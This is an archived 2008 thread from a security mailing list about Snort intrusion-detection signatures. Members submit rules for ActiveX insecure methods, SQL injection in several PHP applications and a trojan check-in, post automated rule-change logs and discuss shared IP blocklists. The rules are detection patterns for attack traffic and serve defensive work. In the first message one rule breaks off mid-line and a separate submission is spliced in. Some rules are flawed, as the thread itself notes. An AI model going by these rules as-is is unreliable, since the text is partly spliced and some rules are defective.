From pepperjack at afferentsecurity.com Wed Oct 1 08:24:42 2008
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 01 Oct 2008 07:24:42 -0500
Subject: [Emerging-Sigs] defect on rule 2008609
Message-ID: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com>

url reference should not have http:// in the rule text:

alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan"; content:"SIVuS_VoIP_Scanner

Hi Matt,

Please find 5 New Signatures below:

1. Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"A662DA7E-CCB7-4743-B71A-D817F6D575DF"; distance:0; nocase; content:"SaveAS"; nocase; classtype:web-application-attack; reference:url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html; reference:url,secunia.com/Advisories/31989/; sid:8409; rev:1;)

2. GdPicture Pro ActiveX control SaveAsPDF Insecure Method.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GdPicture Pro ActiveX control SaveAsPDF Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"E8512363-3581-42EF-A43D-990E7935C8BE"; distance:0; nocase; content:"SaveAsPDF"; nocase; classtype:web-application-attack; reference:url,secunia.com/Advisories/31966/; reference:url,milw0rm.com/exploits/6638; sid:8410; rev:1;)

3. PHP-lance 'catid' sql injection.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHP-Lance show.php catid SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"/show.php?catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32027/; reference:url,www.milw0rm.com/exploits/6605; sid:8406; rev:1;)

4. Real Estate Manager realestate-index.php 'cat_id' sql injection.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Real Estate Manager realestate-index.php cat_id SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"realestate-index.php?"; nocase; uricontent:"&cat_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32049/; reference:url,www.milw0rm.com/exploits/6599; sid:8407; rev:1;)

5. Pilot Online Training Solutions news_read.php 'id' sql injection.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Pilot Online Training Solution news_read.php id SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"/news_read.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/31969/; reference:url,www.milw0rm.com/exploits/6613; sid:8408; rev:1;)

Looking forward to your comments if any...

Thanks & Regards,
StillSecure

From mstone at mathom.us Wed Oct 1 11:56:16 2008
From: mstone at mathom.us (Michael Stone)
Date: Wed, 01 Oct 2008 11:56:16 -0400
Subject: [Emerging-Sigs] TroDjan 2.0 rules
In-Reply-To: <48DBB7EC.5020403@jonkmans.com>
References: <54125DA6FB3A3249B874A94D39E9E6D9038EE8EA@BENDER.centenarycollege.edu> <48DAF6F3.6090404@jonkmans.com> <54125DA6FB3A3249B874A94D39E9E6D9038EEA4D@BENDER.centenarycollege.edu> <48DBB7EC.5020403@jonkmans.com>
Message-ID: <20081001155613.GC6860@mathom.us>

On Thu, Sep 25, 2008 at 12:10:20PM -0400, Matt Jonkman wrote:
> That initial port 1800 connection has the string:
>
> "Windows NT 5.1 (Build 2600: Service Pack 3)"
>
> Which I think we can assume that'll always start with Windows, and always be under say 60 bytes. That should make the first rule more reliable.
> So I'll post this:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET 1800 (msg:"ET TROJAN TroDjan 2.0 Infection Report"; flow:established,to_server; dsize:<60; classtype:trojan-activity; sid:xx; rev:1;)
>
> That look good to everyone?

Well, in the analysis you talked about "start with windows", but the sig only looks at traffic to port 1800 with a size under 60--it's fp'ing like crazy here. (Pretty much all signatures along the lines of "look for a little packet to a particular port" are useless on any kind of busy network, especially if FTP or P2P are present.)

Mike Stone

From jonkman at jonkmans.com Wed Oct 1 12:23:29 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 01 Oct 2008 12:23:29 -0400
Subject: [Emerging-Sigs] TroDjan 2.0 rules
In-Reply-To: <20081001155613.GC6860@mathom.us>
References: <54125DA6FB3A3249B874A94D39E9E6D9038EE8EA@BENDER.centenarycollege.edu> <48DAF6F3.6090404@jonkmans.com> <54125DA6FB3A3249B874A94D39E9E6D9038EEA4D@BENDER.centenarycollege.edu> <48DBB7EC.5020403@jonkmans.com> <20081001155613.GC6860@mathom.us>
Message-ID: <48E3A401.5050906@jonkmans.com>

You're right! I brainfarted the first sig. I meant to put in the windows string but didn't actually do it. Fixing that now!

Matt

Michael Stone wrote:
> On Thu, Sep 25, 2008 at 12:10:20PM -0400, Matt Jonkman wrote:
>> [...]
>
> Well, in the analysis you talked about "start with windows", but the sig only looks at traffic to port 1800 with a size under 60--it's fp'ing like crazy here. (Pretty much all signatures along the lines of "look for a little packet to a particular port" are useless on any kind of busy network, especially if FTP or P2P are present.)
>
> Mike Stone
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Wed Oct 1 12:27:12 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 01 Oct 2008 12:27:12 -0400
Subject: [Emerging-Sigs] defect on rule 2008609
In-Reply-To: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com>
References: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com>
Message-ID: <48E3A4E0.2020801@jonkmans.com>

Thanks Jack, got this fixed as well!
Matt

Jack Pepper wrote:
> url reference should not have http:// in the rule text:
>
>
> alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan"; content:"SIVuS_VoIP_Scanner
> count 3, seconds 10; classtype:attempted-recon; reference:url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html; reference:url,http://www.vopsecurity.org/; sid:2008609; rev:1;)
>
>
> jp
>

From emerging at emergingthreats.net Wed Oct 1 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 1 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081001200008.D8B8045026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Oct 1 16:00:08 2008 [***]

[+++] Added rules: [+++]

    2008611 - ET P2P SoulSeek P2P Login Response (emerging-p2p.rules)

[///] Modified active rules: [///]

    2008587 - ET TROJAN TroDjan 2.0 Infection Report (emerging-virus.rules)
    2008595 - ET P2P SoulSeek P2P Server Connection (emerging-p2p.rules)
    2008607 - ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS (emerging-exploit.rules)
    2008609 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan (emerging-scan.rules)

[+++] Added non-rule lines: [+++]

    -> Added to emerging-sid-msg.map (5):
    2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600
    2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html
    2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org
    2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

    -> Added to emerging-sid-msg.map.txt (5):
    2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600
    2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html
    2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org
    2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (2):
    2008607 || Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600
    2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,http://www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html

    -> Removed from emerging-sid-msg.map.txt (2):
    2008607 || Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600
    2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,http://www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html

From diomar at rmws.net Wed Oct 1 16:24:19 2008
From: diomar at rmws.net (Joe Carvalho)
Date: Wed, 01 Oct 2008 16:24:19 -0400
Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com>
Message-ID: <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net>

any thoughts on alerting/mitigating for this
behavior?

http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html

tnx
--joe

From jonkman at jonkmans.com Wed Oct 1 17:24:40 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 01 Oct 2008 17:24:40 -0400
Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP
In-Reply-To: <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net>
Message-ID: <48E3EA98.7080108@jonkmans.com>

I haven't seen any real detail yet. Anyone listen to the presentation yet? Is there detail in there?

Matt

Joe Carvalho wrote:
> any thoughts on alerting/mitigating for this behavior?
>
> http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html
>
> tnx
> --joe

From jonkman at jonkmans.com Wed Oct 1 18:13:03 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 01 Oct 2008 18:13:03 -0400
Subject: [Emerging-Sigs] StillSecure: Signatures - 1st Oct-08
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com>
Message-ID: <48E3F5EF.3060904@jonkmans.com>

Will get these posted now. The sql injection sigs I'll probably put into web_specific, since the general sql injection sigs will catch those, but it is good to have the more specific sig for shops that need it.

Thanks guys!!

Matt

signatures wrote:
> Hi Matt,
>
> Please find 5 New Signatures below:
>
> [...]
>
> Looking forward to your comments if any...
>
> Thanks & Regards,
> StillSecure

From spooker at gmail.com Wed Oct 1 18:16:29 2008
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Wed, 1 Oct 2008 20:16:29 -0200
Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP
In-Reply-To: <48E3EA98.7080108@jonkmans.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net> <48E3EA98.7080108@jonkmans.com>
Message-ID: <9255886c0810011516q231f6a17taa6bb662c2d9d596@mail.gmail.com>

Nothing really new yet but some points

http://asert.arbornetworks.com/2008/10/thoughts-on-the-tcpip-stack-dos/

Regards,

On Wed, Oct 1, 2008 at 7:24 PM, Matt Jonkman wrote:
> I haven't seen any real detail yet. Anyone listen to the presentation yet? Is there detail in there?
>
> Matt
>
> Joe Carvalho wrote:
> > any thoughts on alerting/mitigating for this behavior?
> > http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html
> >
> > tnx
> > --joe

-- 
===========================
Rodrigo Montoro (Sp0oKeR)
Security Analyst
SnortCP / RHCE / LPIC-I / MCSO
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From frank at knobbe.us Wed Oct 1 22:23:05 2008
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 01 Oct 2008 21:23:05 -0500
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48D90B77.8090607@packetnexus.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com>
Message-ID: <1222914185.36986.112.camel@localhost>

On Tue, 2008-09-23 at 11:29 -0400, Jason Lewis wrote:
> Applications that block hosts on your network and let you share the data are interesting to me. There is a trust issue and a possible attack vector, but it's interesting data.

Hi Jason,

there is also a usability aspect to consider. Several years back we peered live Snortsam block feeds amongst a group of 4-5, each managing/monitoring larger networks. I did a bit of research during this time, and came to realize that hostile IP's divide into two categories, those that are likely to hit you and those that are not. For example, known botnet controllers, phishing and malware sites (even though numerous) are very useful to share since they do affect us all. However, the other group, comprising port scanners, brute-force IP's, and at one time, a live-feed of joining botnet zombies/drones, has a lower chance of affecting your network.

There are IP's which scans can and do affect a larger population. But a large percentage appeared to just have a local impact, mostly due to the way the scanning engines are implemented and/or targeted.

I'm currently massaging an IP address intelligence database I accumulated over time, and see some surprising results and a clear split of the affect-all-evil-IPs and the localized-evil-IPs.

Sharing of block data is all well intended, but I don't think we should just share them all without qualification. Take DShield for example. The block list they offer is comprised of the IP's that most of us have encountered. Sharing a DenyHosts list of a single entity (or a combined list of several entities) will inflate your pool of hostile IP's with a large amount of IP's that will likely never hit you.

Instead of just sharing lists of blocked IP's, which would inevitably result in a large number of IP's, I think we should start a project, similar to DShield (but not exactly the same -- we certainly don't need to reinvent the wheel), that takes all the IP address information from various sources and qualifies them by how many reports by how many individuals and lists they have been reported on. That will result in a smaller list of IP addresses that have a higher chance of affecting someone.

If you want an unqualified list of IP's, I can throw millions of IP's I logged at you. Of course your firewall is gonna seize up with such a huge block list :) I think qualifying reported IP's and condensing a high-risk, high-value, smaller list will be much more usable.

Matt, if you like to collaborate on a project like that, please let me know. (or maybe you have such a thing and I just haven't seen it yet ;)

Cheers,
Frank

-- 
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.

From jonkman at jonkmans.com Thu Oct 2 10:50:21 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 02 Oct 2008 10:50:21 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <1222914185.36986.112.camel@localhost>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost>
Message-ID: <48E4DFAD.5060901@jonkmans.com>

Frank Knobbe wrote:
> Instead of just sharing lists of blocked IP's, which would inevitably result in a large number of IP's, I think we should start a project, similar to DShield (but not exactly the same -- we certainly don't need to reinvent the wheel), that takes all the IP address information from various sources and qualifies them by how many reports by how many individuals and lists they have been reported on. That will result in a smaller list of IP addresses that have a higher chance of affecting someone.
>
> If you want an unqualified list of IP's, I can throw millions of IP's I logged at you. Of course your firewall is gonna seize up with such a huge block list :) I think qualifying reported IP's and condensing a high-risk, high-value, smaller list will be much more usable.
>
>
> Matt, if you like to collaborate on a project like that, please let me know. (or maybe you have such a thing and I just haven't seen it yet ;)

Funny you should mention that. This is exactly what SIDReporter intends to be. By using attackers linked to the signature they tripped and then correlating that amongst many sites for reliability, I believe we can make a VERY good list of things to block and feed that back to our users.

We can even filter those lists by service. Say a site is only a webfarm with no ssh exposed. They could choose to not get IPs that were only listed for ssh brute forcing, or only for netbios attacks, etc.

The data is starting to flow with SIDReporter, thanks to the folks using it so far. We're learning how to manipulate this data and will be feeding back some trends and top attackers very soon.

More input is required though, so please consider setting up and feeding back, it's all anonymous!!
http://doc.emergingthreats.net/bin/view/Main/SidReporter

Matt

> Cheers,
> Frank

From jlewis at packetnexus.com Thu Oct 2 11:04:22 2008
From: jlewis at packetnexus.com (Jason Lewis)
Date: Thu, 02 Oct 2008 11:04:22 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <1222914185.36986.112.camel@localhost>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost>
Message-ID: <48E4E2F6.9020005@packetnexus.com>

Frank this sounds to me like an IP reputation system. I've given some thought to a system that tracked IP reputation, which would in turn lead to a CIDR reputation list as well as Autonomous System rep list. The idea is that a CIDR with lots of bad IPs would also be bad by association. It seems that a few spam blacklists work in a similar way.

The idea of data merging isn't new and that sounds like what you're proposing. If an IP is on a botnet list and a spam list and an IDS alert list, etc... you would start to think blocking that IP is a good idea.

jas

Frank Knobbe wrote:
> [...]

From jonkman at jonkmans.com Thu Oct 2 11:09:22 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 02 Oct 2008 11:09:22 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4E2F6.9020005@packetnexus.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com>
Message-ID: <48E4E422.8080405@jonkmans.com>

That's absolutely where we're going with SIDReporter Jason. More data sources, and some intelligent correlation. But we're learning as we go.

The example Frank cited where we tried a shared snortsam feed: Worked GREAT! until we got to a large number of blocks. Then we had reliability and scale issues. I hope we can solve those issues here.

But we need the data! :)

Matt

Jason Lewis wrote:
> Frank this sounds to me like an IP reputation system. I've given some thought to a system that tracked IP reputation, which would in turn lead to a CIDR reputation list as well as Autonomous System rep list. The idea is that a CIDR with lots of bad IPs would also be bad by association. It seems that a few spam blacklists work in a similar way.
>
> The idea of data merging isn't new and that sounds like what you're proposing. If an IP is on a botnet list and a spam list and an IDS alert list, etc... you would start to think blocking that IP is a good idea.
>
> jas
>
> Frank Knobbe wrote:
>> [...]

From jlewis at packetnexus.com Thu Oct 2 11:32:45 2008
From: jlewis at packetnexus.com (Jason Lewis)
Date: Thu, 02 Oct 2008 11:32:45 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4E422.8080405@jonkmans.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com>
Message-ID: <48E4E99D.5010408@packetnexus.com>

One of my interests in honeypots is analysis and traceback of the IPs visiting
the honeypot. I'm not so much interested in the malware as the network
information collected. The correlation of honeypots with other malicious
activity is something I'm actively investigating.

Along those lines, does anyone have detailed nepenthes documentation about
modules and configuration? White papers would also be of interest.

Matt Jonkman wrote:
> That's absolutely where we're going with SIDReporter Jason. More data
> sources, and some intelligent correlation. But we're learning as we go.
>
> The example Frank cited where we tried a shared snortsam feed: Worked
> GREAT! until we got to a large number of blocks. Then we had reliability
> and scale issues. I hope we can solve those issues here.
>
> But we need the data! :)
>
> Matt
>

From jonkman at jonkmans.com Thu Oct 2 11:46:00 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 02 Oct 2008 11:46:00 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4E99D.5010408@packetnexus.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com>
Message-ID: <48E4ECB8.9040501@jonkmans.com>

Jason Lewis wrote:
> One of my interests in honeypots is analysis and traceback of the IPs
> visiting the honeypot. I'm not so much interested in the malware as the
> network information collected. The correlation of honeypots with other
> malicious activity is something I'm actively investigating.

Agreed, I run a number of nepenthes boxes and snort in front of them with a
relevant ruleset. Feeds us great data about infected nodes out there into
SIDReporter!

> Along those lines, does anyone have detailed nepenthes documentation
> about modules and configuration? White papers would also be of interest.
>

For the most part it's pretty self-explanatory I've found. Install and
look at nepenthes.conf.
It'll mostly run out of the box (if you get all the right libs to compile).

If you have trouble post it here, very relevant to this list, and there
are a lot of users of nep here.

matt

> Matt Jonkman wrote:
>> That's absolutely where we're going with SIDReporter Jason. More data
>> sources, and some intelligent correlation. But we're learning as we go.
>>
>> The example Frank cited where we tried a shared snortsam feed: Worked
>> GREAT! until we got to a large number of blocks. Then we had reliability
>> and scale issues. I hope we can solve those issues here.
>>
>> But we need the data! :)
>>
>> Matt
>>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jlewis at packetnexus.com Thu Oct 2 12:01:16 2008
From: jlewis at packetnexus.com (Jason Lewis)
Date: Thu, 02 Oct 2008 12:01:16 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4ECB8.9040501@jonkmans.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com> <48E4ECB8.9040501@jonkmans.com>
Message-ID: <48E4F04C.9020606@packetnexus.com>

I have it running and it's working fine. I guess I was looking for more
in-depth stuff like building modules and what other configurations people
have...like using snort in front of the nepenthes box. Are there any
nepenthes modules people have built that are worth looking at and aren't
included with the source? The nepenthes mailing list seems low traffic, so
it doesn't look like much help.
> For the most part it's pretty self-explanatory I've found. Install and
> look at nepenthes.conf. It'll mostly run out of the box (if you get all
> the right libs to compile)
>
> If you have trouble post it here, very relevant to this list, and there
> are a lot of users of nep here.
>
> matt
>

From pepperjack at afferentsecurity.com Thu Oct 2 12:16:27 2008
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 02 Oct 2008 11:16:27 -0500
Subject: [Emerging-Sigs] RBN rules
Message-ID: <20081002111627.tnx37gytc4cgcws4@mail.afferentsecurity.com>

How does the end of Atrivo affect the RBN rulesets?

What are the criteria for hosts to be on the "Known Russian Business
Network Monitored Domains" rules (sids 2406000++)?

Do the various RBN sids represent different bases for making the list?

thanks.

jp

--
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From emerging at emergingthreats.net Thu Oct 2 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 2 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081002200008.878134502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu Oct 2 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008612 - ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method (emerging-exploit.rules)
2008613 - ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method (emerging-exploit.rules)
2008614 - ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection (emerging-web_sql_injection.rules)
2008615 - ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection (emerging-web_sql_injection.rules)
2008616 - ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection (emerging-web_sql_injection.rules)
2008617 -
ET SCAN Wikto Scan (emerging-scan.rules)

[///] Modified active rules: [///]

2008508 - ET CURRENT_EVENTS Internal User may have Visited an ASPROX Infected Site (emerging.rules)
2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules)
2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules)
2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules)
2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules)
2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules)
2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules)
2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules)
2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules)
2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules)
2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules)
2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules)
2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules)
2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules)
2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules)
2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules)
2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules)
2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules)
2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules)
2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules)
2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules)
2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules)
2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules)
2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules)
